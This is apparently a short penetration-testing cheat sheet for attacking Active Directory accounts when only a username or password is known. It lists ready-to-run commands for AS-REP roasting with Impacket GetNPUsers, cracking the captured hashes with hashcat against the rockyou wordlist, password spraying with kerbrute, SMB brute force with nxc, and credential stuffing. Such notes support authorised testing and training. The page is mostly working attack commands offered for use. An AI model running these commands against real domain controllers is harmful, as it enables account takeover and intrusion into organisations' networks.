githubEdit

One Credential Only

Username

1) ASREProasting

Do ASREProasting

Impacket-GetNPUsers domain/ -usersfile usernames.txt -format hashcat -dc-ip DC_IP -dc-host dc.domain.local -outputfile asreproasted.txt -request

Impacket-GetNPUsers domain/user -format hashcat -dc-ip DC_IP -dc-host dc.domain.local -outputfile asreproasted.txt -request

Crack Hash

hashcat -m 18200 -a 0 asreproasted.txt /usr/share/wordlists/rockyou.txt

2) Password Attack

Do a password attack by using username as password

kerbrute passwordspray -d domain.local --dc dc.domain.local --user-as-pass users.txt

Brute force attack

nxc smb domain.local -u user -p passwords.txt 

Password

1) Password Spray

Use a single password against different users

Both (Verification Methods)

1) Credential Stuffing

Do a credential stuffing attack using the username and password wordlists you have created

Test user=password (1 line per test)

Last updated